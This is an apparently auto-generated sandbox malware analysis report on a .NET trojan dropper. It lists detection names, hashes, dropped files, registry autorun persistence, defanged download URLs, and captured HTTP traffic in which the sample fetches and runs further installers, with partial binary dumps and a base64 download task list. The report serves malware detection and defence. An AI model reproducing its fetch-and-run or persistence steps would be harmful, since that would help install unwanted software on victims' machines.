Trojan.MSIL.Agent.CLS_19e3b36f34

by malwarelabrobot on July 1st, 2017 in Malware Descriptions.

Trojan.MSIL.Agent.CLS (BitDefender), VirTool:MSIL/Injector (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.DownLoader25.742 (DrWeb), Trojan.MSIL.Agent.CLS (B) (Emsisoft), GenericRXBW-DU!19E3B36F3494 (McAfee), Trojan.Gen (Symantec), Trojan.MSIL.Crypt (Ikarus), Trojan.MSIL.Agent.CLS (FSecure), Win32:Malware-gen (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R08NC0DFS17 (TrendMicro), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 19e3b36f349412e88daa21153ce09b11
SHA1: e2567ef57e36e853cd80d09a502430551b340d75
SHA256: ffeb89d627c252f96244d184c752f7ac120f3970f28ae86ae4dc8cd7a5bf1f29
SSDeep: 6144:7nQgKlFzmrcv9uZgimfBmhGhqsW9rttGvo8IsSIdjfEDjxKwALxPHuok/3ifD:slFSi9uZAf4h8q97GQ8IrDJixPuP3ifD
Size: 340480 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-06-28 03:10:35
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3604
AfficheOne.exe:2272
Era5Le.exe:4064
Like.exe:2172

The Trojan injects its code into the following process(es):

i3dhyoluabb.exe:2276
%original file name%.exe:4020
UGRWL2XSH.exe:1636

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:4020 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Like.exe.config (1 bytes)
C:\config.conf (62 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Like.exe (130758 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe (196 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Era5Le.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Era5Le.exe (20675 bytes)

The process UGRWL2XSH.exe:1636 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\UGRWL2XSHI\cast.config (37 bytes)

The process AfficheOne.exe:2272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (868 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe (208 bytes)

The process Era5Le.exe:4064 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\UGRWL2XSHI\uninstaller.exe.config (1 bytes)
%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe.config (1 bytes)
%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe (65121 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
%Program Files%\UGRWL2XSHI\uninstaller.exe (4646 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.4064.1496689 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.4064.1496689 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.4064.1496704 (0 bytes)

The process Like.exe:2172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (844 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (844 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (844 bytes)

The Trojan deletes the following file(s):

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2172.1499840 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2172.1499840 (0 bytes)

Registry activity

The process i3dhyoluabb.exe:2276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"kxmpfu4ih3u" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe"

The process %original file name%.exe:4020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\19e3b36f349412e88daa21153ce09b11_RASAPI32]
"EnableConsoleTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_3TCY2" = "C:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process UGRWL2XSH.exe:1636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UGRWL2XSH_RASAPI32]
"ConsoleTracingMask" = "4294901760"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"9MB0X2MTSJK0LGC" = "%Program Files%\UGRWL2XSHI\UGRWL2XSH.exe"

The process AfficheOne.exe:2272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\AfficheOne_RASAPI32]
"ConsoleTracingMask" = "4294901760"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Era5Le.exe:4064 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Era5Le_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Like.exe:2172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Like_RASAPI32]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"

Dropped PE files

MD5 File path
b52b8e68a402314a2b93b2bf62bb9b0a c:\Program Files\UGRWL2XSHI\UGRWL2XSH.exe
feab31fd4ccd4ef03c01ac4915485843 c:\Program Files\UGRWL2XSHI\uninstaller.exe
0e94d32f9913e36c636107c915e2d256 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\AfficheOne.exe
5129835550b63eb92bd50afb4289cf99 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Era5Le.exe
5704ea6ce7192515d0bf41d82220c4e3 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\10LV1RKEX2\Like.exe
e31b5dc7c12fbb344fdf9e4db1946c45 c:\Users\"%CurrentUserName%"\AppData\Roaming\k4n1pqkyz3z\i3dhyoluabb.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: T@
Product Name:
Product Version: 0.0.4.7
Legal Copyright: Copyright (c) 6610
Legal Trademarks:
Original Filename: SanJer66.exe
Internal Name: SanJer66.exe
File Version: 0.0.4.7
File Description: T@QG@
Comments:
Language: German (Germany)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 334660 334848 4.20182 71126a674a48d1e22e69c6a471327567
.rsrc 344064 4432 4608 3.49132 563e801812acaf94f7948814597924b5
.reloc 352256 12 512 0.070639 477861516b65fa139da34a102b43a27a

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.wizzmonetize.com/remotes_xml_sections.php 188.165.209.131
hxxp://lapapahoster.com/from_backup/AdsShow_installer.exe 94.23.252.37
hxxp://lapapahoster.com/download/3/wizzcaster_installer_v2.exe 94.23.252.37
hxxp://lapapahoster.com/get/4/updater.exe 94.23.252.37
hxxp://lapapahoster.com/safe_download/582369/AdsShow.exe 94.23.252.37
hxxp://lapapahoster.com/download/3/wizzcaster_v2.exe 94.23.252.37
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 188.165.209.131
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 188.165.209.131
hxxp://lapapahoster.com/download/3/wizzcaster_uninstaller_v2.exe 94.23.252.37
hxxp://www.wizzmonetize.com/api/v5/config 188.165.209.131
hxxp://wizzcaster.com/api/v5/config 176.31.252.74
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok 176.31.106.195
hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load 176.31.106.195
dns.msftncsi.com 131.107.255.255
teredo.ipv6.microsoft.com 157.56.120.207


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:46 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2200..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..=.VY.........."...0..............4... ...@....@.. ..................
..................@..................................3..O....@........
...............`.......2..............................................
. ............... ..H............text...4.... ...................... .
.`.rsrc........@......................@..@.reloc.......`....... ......
........@..B.................4......H........!...............1........
.......................................0..k.........,f.. ..... ....1..
....X.. ....2.~....r...p.o....%(....r]..pra..po....rc..p(....o....rc..
p(....o....o....*..(....*..0..2.......s.......(....rg..p( ....-...."..
.C ....(.... .&..*...................0..[........,."...E.. P.....rw..p
..,. `......o!...Z("......r...p(#...&r...p($...& `.......o!...Z("...*.
~....-.r...p.....(%...o&...s'........~....*.~....*.......*.~....*..((.
..*Vs....()...t.........*.BSJB............v2.0.50727......l.......#~..
....\...#Strings....\.......#US.........#GUID...........#Blob.........
..WU.........3........'...................)...........................
........................{.................d.......=...^.=...?.=.....=.
....=.....=.....=.........7.......=.........#.....\.I.................
....O.....E.....v...........o.....Y.......................@...........
r.....g.....7.=.........1.V.........`...........................J.w.I.
..........w.I...........w.I...........s.I...........s.u.........J.
<<< skipped >>>


POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 100 Continue......




remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1

HTTP/1.1 200 OK


Date: Fri, 30 Jun 2017 10:08:33 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=jr16pos8juhvat7njers9glfs4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1644
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
PHVwZGF0ZXMgcmVmcmVzaD0iMTgwIj4KCjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd2
5sb2FkIG5hbWU9IkFmZmljaGVPbmUiIHZhbHVlPSJodHRwOi8vbGFwYXBhaG9zdGVyLmNv
bS9mcm9tX2JhY2t1cC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249IiIgIHNvZn
R3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IkFm
ZmljaGVPbmUiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW9kIH
R5cGU9ImFkZCIgbmFtZT0iQWZmaWNoZU9uZSIgdmFsdWU9IjVlZTE3MDYzMCIvPg0KDQo8
L3BlcmZvcm0 DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPS
JBZmZpY2hlT25lIiB2YWx1ZT0iOTUxNzA2MzAiIG1hdGNoPSJmYWxzZSIvPg0KDQo8L2Nv
bmRpdGlvbnM DQo8L3Rhc2s PHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bmxvYWQgbm
FtZT0iRXJhNUxlIiB2YWx1ZT0iaHR0cDovL2xhcGFwYWhvc3Rlci5jb20vZG93bmxvYWQv
My93aXp6Y2FzdGVyX2luc3RhbGxlcl92Mi5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPS
IiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9IkVyYTVMZSIg
dmFsdWU9Im5vdHdhaXQiIHBhcmFtcz0iNTdhNzY0ZDA0MmJmOCIvPg0KPG1vZCB0eXBlPS
JhZGQiIG5hbWU9IkVyYTVMZSIgdmFsdWU9IjF0dDE3MDYzMCIvPg0KDQo8L3BlcmZvcm0 
DQoNCjxjb25kaXRpb25zPg0KDQo8bW9kIHR5cGU9ImNoZWNrIiBuYW1lPSJFcmE1TGUiIH
ZhbHVlPSJ1MTcwNjMwIiBtYXRjaD0iZmFsc2UiLz4NCg0KPC9jb25kaXRpb25zPg0KPC90
YXNrPjx0YXNrPg0KDQo8cGVyZm9ybT4NCg0KPGRvd25sb2FkIG5hbWU9Ikxpa2UiIHZhbH
VlPSJodHRwOi8vbGFwYXBhaG9zdGVyLmNvbS9nZXQvNC91cGRhdGVyLmV4ZSIgdmVyc2lv
bj0iIiAgc29mdHdhcmU9IiIgbmV0PSJ5ZXMiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydC
IgbmFtZT0iTGlrZSIgdmFsdWU9IndhaXQiIHBhcmFtcz0id2UiLz4NCjxtb2QgdHlwZT0i
YWRkIiBuYW1lPSJ1cFRvRGF0ZSIgdmFsdWU9IlNTYWFhMTcwNjMwIi8 DQoNCjwvcGVyZm
9ybT4NCg0KPGNvbmRpdGlvbnM DQoNCjxtb2QgdHlwZT0iY2hlY2siIG5hbWU9InVw
<<< skipped >>>


POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive

uid=57a764d042bf8&days_after_install=0
HTTP/1.1 100 Continue
HTTP/1.1 200 OK..Date: Fri, 30 Jun 2017 10:08:54 GMT..Server: Apache/2
.4.10 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=b
309e258715f8ca91836ca2a05c8ae87307acd2b; expires=Fri, 30-Jun-2017 12:0
8:54 GMT; Max-Age=7200; path=/; httponly..Content-Length: 28..Keep-Ali
ve: timeout=10, max=100..Connection: Keep-Alive..Content-Type: text/ht
ml; charset=UTF-8..{"time_between_prints":"15"}..



GET /from_backup/AdsShow_installer.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:39 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2800..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
....VY.........."...0..............;... ...@....@.. ..................
..................@.................................l;..O....@..@.....
...............`......4:..............................................
. ............... ..H............text........ ...................... .
.`.rsrc...@....@......................@..@.reloc.......`.......&......
........@..B.................;......H........"..............|9........
.......................................0............(....(....r...pr..
.po....(....%(....&(....r...pr...po....r...p(....(....... $. ....3... 
.. ....&&..X.. ....2...X.. ....2.s....r...ps.....o......(......&..*...
.................0..>.......(...........%.r...p.%.r...p.%.r...p.%.r
_..p.%.r...p.%.r...p.%.r...p.%.r...p.%.rw..p.%..r...p.%..r...p.%..r\..
p.%..r...p.%..r...p.%..rc..p.%..r...p.%..r...p.%..r...p.%..r...p.%..r)
..p.%..rC..p.%..ra..p.%..r...p.%..r...p.%..r...p.%..r1..p.(....... .. 
....3.........X.. ....2..rS..p(.....(......,.....(....&*.r...p(....&*.
.( ...*.~....-.rc..p.....(!...o"...s#........~....*.~....*.......*.~..
..*..($...*Vs....(%...t.........*..BSJB............v2.0.50727......l..
.(...#~......(...#Strings............#US.`.......#GUID...p...L...#Blob
...........W..........3........'...................%..................
.............................K. ..... .........{.......q.....q.....q..
...q...k.q.....q.....q.........=.......q.....%.....%.....%...K....
<<< skipped >>>

GET /download/3/wizzcaster_installer_v2.exe HTTP/1.1


Host: lapapahoster.com


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:40 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
54e00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
.....VY.........."...0..8...........W... ...`....@.. .................
...................@.................................\W..O....`..p....
.......................$V.............................................
.. ............... ..H............text....7... ...8.................. 
..`.rsrc...p....`.......:..............@..@.reloc...............L.....
.........@..B.................W......H........#...............4..8!...
........................................0..Y........r...p(......~....o
............o......r[..po.......$....o......rk..po..... .....$....o...
...r...po.......%....o......r...po.......&....o......r...po.....(.....
(....o......)...%..,.o......(.....o......r...po.....(.....(....o......
)...%..,.o......(.....o......r...p~....o.............o....t.......o...
...o ...(!.....(............io"...o...... ...*....0..)........(......s
#.....o$.....o%.....o&...... ..*....0...........('.....r...po(.... ..*
".()....*^..}.....(*......(.....*.0..n.........(......)...%.._.o......
..... ....(....(......( .....o,...r...po......o-...t.............%...o
....&.........*..........fg.......0.. .........,..{....... ....,...{..
..o........(/....*...s0...}......(1.....r...po2....*&..(.....*&.()....
.*....0..9........~.........,".r...p.....(3...o4...s5...........~.....
 ..*....0...........~..... ..*".......*.0...........~..... ..*".(6....
*Vs....(7...t.........*..BSJB............v2.0.50727......l.......#
<<< skipped >>>

GET /get/4/updater.exe HTTP/1.1


Host: lapapahoster.com


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:41 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
211a00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L.....VY.........."...0...!.........V"!.. ...@!...@.. ................
........!...........@.................................."!.O....@!.p...
.................`!...... !...........................................
... ............... ..H............text...\.!.. ....!.................
 ..`.rsrc...p....@!.......!.............@..@.reloc.......`!.......!...
..........@..B................8"!.....H........#...............4.... .
.........................................0..Y........r...p(......~....
o............o......r[..po.......$....o......rk..po..... .....$....o..
....r...po.......%....o......r...po.......&....o......r...po.....(....
.(....o......)...%..,.o......(.....o......r...po.....(.....(....o.....
.)...%..,.o......(.....o......r...p~....o.............o....t.......o..
....o ...(!.....(............io"...o...... ...*....0..)........(......
s#.....o$.....o%.....o&...... ..*....0...........('.....r...po(.... ..
*".()....*^..}.....(*......(.....*.0..n.........(......)...%.._.o.....
...... ....(....(......( .....o,...r...po......o-...t.............%...
o....&.........*..........fg.......0.. .........,..{....... ....,...{.
...o........(/....*...s0...}......(1.....r...po2....*&..(.....*&.()...
..*....0..9........~.........,".r...p.....(3...o4...s5...........~....
. ..*....0...........~..... ..*".......*.0...........~..... ..*".(6...
.*Vs....(7...t.........*..BSJB............v2.0.50727......l.......
<<< skipped >>>


GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: lapapahoster.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 30 Jun 2017 10:08:48 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
fe000..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
.....VY.........."...0.............n.... ........@.. .................
......@............@.....................................O.......D....
................ .....................................................
.. ............... ..H............text...t.... ...................... 
..`.rsrc...D...........................@..@.reloc....... .............
.........@..B................P.......H........#...............4.......
........................................0..Y........r...p(......~....o
............o......r[..po.......$....o......rk..po..... .....$....o...
...r...po.......%....o......r...po.......&....o......r...po.....(.....
(....o......)...%..,.o......(.....o......r...po.....(.....(....o......
)...%..,.o......(.....o......r...p~....o.............o....t.......o...
...o ...(!.....(............io"...o...... ...*....0..)........(......s
#.....o$.....o%.....o&...... ..*....0...........('.....r...po(.... ..*
".()....*^..}.....(*......(.....*.0..n.........(......)...%.._.o......
..... ....(....(......( .....o,...r...po......o-...t.............%...o
....&.........*..........fg.......0.. .........,..{....... ....,...{..
..o........(/....*...s0...}......(1.....r...po2....*&..(.....*&.()....
.*....0..9........~.........,".r...p.....(3...o4...s5...........~.....
 ..*....0...........~..... ..*".......*.0...........~..... ..*".(6....
*Vs....(7...t.........*..BSJB............v2.0.50727......l.......#
